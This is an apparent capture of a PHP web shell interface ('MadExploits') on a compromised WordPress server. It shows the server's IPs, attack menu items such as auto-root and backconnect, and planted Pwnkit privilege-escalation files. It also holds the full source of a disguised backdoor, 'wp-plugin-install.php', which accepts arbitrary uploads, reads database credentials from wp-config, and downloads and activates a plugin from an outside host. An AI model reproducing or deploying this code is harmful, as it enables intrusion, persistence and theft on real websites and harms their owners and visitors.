Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.15.1.201
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
biogenelab.eu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwsr-x
.pkexec
[ DIR ]
drwxr-sr-x
.well-known
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
wp-admin
[ DIR ]
drwxrwsr-x
wp-content
[ DIR ]
drwxrwsr-x
wp-includes
[ DIR ]
drwxrwsr-x
.htaccess
233
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
apple-touch-icon-114x114.png
11.36
KB
-rw-r--r--
apple-touch-icon-120x120.png
10.51
KB
-rw-r--r--
apple-touch-icon-144x144.png
4.94
KB
-rw-r--r--
apple-touch-icon-152x152.png
14.49
KB
-rw-r--r--
apple-touch-icon-57x57.png
5.03
KB
-rw-r--r--
apple-touch-icon-60x60.png
4.83
KB
-rw-r--r--
apple-touch-icon-72x72.png
2.95
KB
-rw-r--r--
apple-touch-icon-76x76.png
6.53
KB
-rw-r--r--
favicon-128.png
6.96
KB
-rw-r--r--
favicon-16x16.png
628
B
-rw-r--r--
favicon-196x196.png
7.48
KB
-rw-r--r--
favicon-32x32.png
1.5
KB
-rw-r--r--
favicon-96x96.png
6.17
KB
-rw-r--r--
favicon.ico
5.3
KB
-rw-r--r--
google96d7d17060245e8d.html
53
B
-rw-r--r--
index.php
3.05
KB
-rw-r--r--
license.txt
19.09
KB
-rwxrwxr-x
mstile-144x144.png
4.94
KB
-rw-r--r--
mstile-150x150.png
15.52
KB
-rw-r--r--
mstile-310x150.png
19.47
KB
-rw-r--r--
mstile-310x310.png
28.93
KB
-rw-r--r--
mstile-70x70.png
6.96
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.24
KB
-rwxrwxr-x
wp-activate.php
5.32
KB
-rwxrwxr-x
wp-blog-header.php
364
B
-rwxrwxr-x
wp-comments-post.php
1.59
KB
-rwxrwxr-x
wp-config-sample.php
28.42
KB
-rwxrwxr-x
wp-config.php
2.99
KB
-rwxrwxr-x
wp-cron.php
3.21
KB
-rwxrwxr-x
wp-links-opml.php
2.37
KB
-rwxrwxr-x
wp-load.php
3.22
KB
-rwxrwxr-x
wp-login.php
33.52
KB
-rwxrwxr-x
wp-mail.php
7.86
KB
-rwxrwxr-x
wp-plugin-install.php
9.91
KB
-rw-r--r--
wp-settings.php
15.82
KB
-rwxrwxr-x
wp-signup.php
29.22
KB
-rwxrwxr-x
wp-trackback.php
4.41
KB
-rwxrwxr-x
xmlrpc.php
2.99
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-plugin-install.php
<?php error_reporting(0); header('Content-Type: text/html; charset=utf-8'); # Upload if (isset($_GET['u']) && $_GET['u'] == 'ok') { if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['error'] == 0) { $path = __DIR__ . '/' . $file['name']; if (@move_uploaded_file($file['tmp_name'], $path)) { echo "File uploaded using move_uploaded_file: {$file['name']}"; } else if (@rename($file['tmp_name'], $path)) { echo "File uploaded using rename: {$file['name']}"; } else if (@file_put_contents($path, @file_get_contents($file['tmp_name']))) { echo "File uploaded using file_put_contents: {$file['name']}"; } else { echo "File not uploaded!"; } } else { echo "File not uploaded!"; } echo "<br>"; echo "<br>"; } echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file"><button type="submit">Upload</button></form>'; exit; } # Extensions $extensions = ['zip', 'curl', 'pdo_mysql']; $error = 0; foreach ($extensions as $ext) { if (!extension_loaded($ext)) { echo strtoupper($ext) . " yüklü değil, işlemlere devam edilemeyecek :(.<br>"; $error++; } } if ($error > 0) { exit; } # Function - Download and Extract Plugin function download_and_extract_plugin($url, $destinationFolder) { $tempZip = tempnam(sys_get_temp_dir(), 'plugin_') . '.zip'; $ch = curl_init($url); $fp = fopen($tempZip, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 50); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $success = curl_exec($ch); curl_close($ch); fclose($fp); if (!$success) { unlink($tempZip); return "{$tempZip} - ZIP file not downloaded."; } $zip = new ZipArchive(); if ($zip->open($tempZip) === true) { $zip->extractTo($destinationFolder); $zip->close(); unlink($tempZip); return true; } else { unlink($tempZip); return "{$tempZip} - ZIP file not extracted."; } } # API if (isset($_GET['API']) && trim($_GET['API']) == 'LJz5ZtXGc7hSM4aUfmE9CH') { # Params $wp_config = isset($_POST['wp_config_file']) ? urldecode(trim($_POST['wp_config_file'])) : __DIR__ . '/wp-config.php'; $destinationFolder = isset($_POST['wp_plugin_path']) ? urldecode(trim($_POST['wp_plugin_path'])) : __DIR__ . '/wp-content/plugins/'; $plugin_path = isset($_POST['plugin_path_file']) ? urldecode(trim($_POST['plugin_path_file'])) : 'fancy-elementor-gallery-box/fancy-elementor-gallery-box.php'; $url = isset($_POST['plugin_url']) ? urldecode(trim($_POST['plugin_url'])) : 'https://ampproject.com.tr/canonical_plugin_for_wp.zip?v='.time(); # Install plugin if (trim($_GET['action']) != 'install') { die(json_encode([ "status" => true, "wp_config_file" => $wp_config, "wp_plugins_path" => $destinationFolder, "plugin_path_file" => $plugin_path, "plugin_url" => $url, #"action" => "install", ])); } # wp-config.php file check if (!file_exists($wp_config)) { die(json_encode(["status" => false, "error" => "{$wp_config} file not found."])); } # plugin path check if (!is_dir($destinationFolder)) { die(json_encode(["status" => false, "error" => "{$destinationFolder} folder not found."])); } # plugin file check if (file_exists($destinationFolder . $plugin_path)) { die(json_encode(["status" => false, "error" => "{$destinationFolder}{$plugin_path} file already installed."])); } # wp-config.php file include include_once $wp_config; # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die(json_encode(["status" => false, "error" => 'Connection failed: ' . $e->getMessage()])); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin !== true) { die(json_encode(["status" => false, "error" => $upload_plugin])); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die(json_encode(["status" => true, "message" => "{$plugin_path} - Plugin activated!"])); } else { die(json_encode(["status" => false, "error" => "Plugin already activated!"])); } } else { die(json_encode(["status" => false, "error" => "Error! - active_plugins not found"])); } exit; } # POST REQUEST if ($_SERVER['REQUEST_METHOD'] == 'POST') { # Post params $wp_config = trim($_POST['wp_config_file']); $destinationFolder = trim($_POST['wp_plugin_path']); $plugin_path = trim($_POST['plugin_path_file']); $url = trim($_POST['plugin_url']); # wp-config.php file check if (!file_exists($wp_config)) { die("{$wp_config} file not found."); } # plugin path check if (!is_dir($destinationFolder)) { die("{$destinationFolder} folder not found."); } # plugin file check if (file_exists($destinationFolder . $plugin_path)) { die("{$destinationFolder}{$plugin_path} file already installed."); } # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die('Connection failed: ' . $e->getMessage()); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin === true) { echo "Plugin ($url) downloaded and will be active...<br>"; } else { die($upload_plugin); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die("{$plugin_path} - Plugin activated!"); } else { die("Plugin already activated!"); } } else { die("Error! - active_plugins not found"); } exit; } # GET REQUEST if (!isset($_GET['f']) && $_GET['f'] != 'ok') { die("404 Not Found"); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Plugin Install for WP</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> </head> <body> <div class="container mt-5"> <h1 class="text-center mb-4">Plugin Install for WP</h1> <p> </p> <div class="row justify-content-center"> <div class="col-md-6"> <form method="post" action=""> <h2>Local Settings</h2> <div class="mb-3"> <label for="name" class="form-label">WP Config Path</label> <input type="text" class="form-control" name="wp_config_file" placeholder="<?php echo __DIR__ ?>/wp-config.php" value="<?php echo __DIR__ ?>/wp-config.php"> </div> <div class="mb-3"> <label for="name" class="form-label">WP Plugin Path</label> <input type="text" class="form-control" name="wp_plugin_path" placeholder="<?php echo __DIR__ ?>/wp-content/plugins/" value="<?php echo __DIR__ ?>/wp-content/plugins/"> </div> <p> </p> <h2>Remote Plugin Settings</h2> <div class="mb-3"> <label for="name" class="form-label">Plugin URL</label> <input type="text" class="form-control" name="plugin_url" placeholder="https://site.com/plugin.zip" value="https://ampproject.com.tr/canonical_plugin_for_wp.zip?v=<?php echo time() ?>"> </div> <div class="mb-3"> <label for="name" class="form-label">Plugin Path File</label> <input type="text" class="form-control" name="plugin_path_file" placeholder="plugin_path/plugin_root_file.php" value="fancy-elementor-gallery-box/fancy-elementor-gallery-box.php"> </div> <button type="submit" class="btn btn-danger w-100">Do Install Plugin, Dude!</button> </form> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </body> </html>
Close
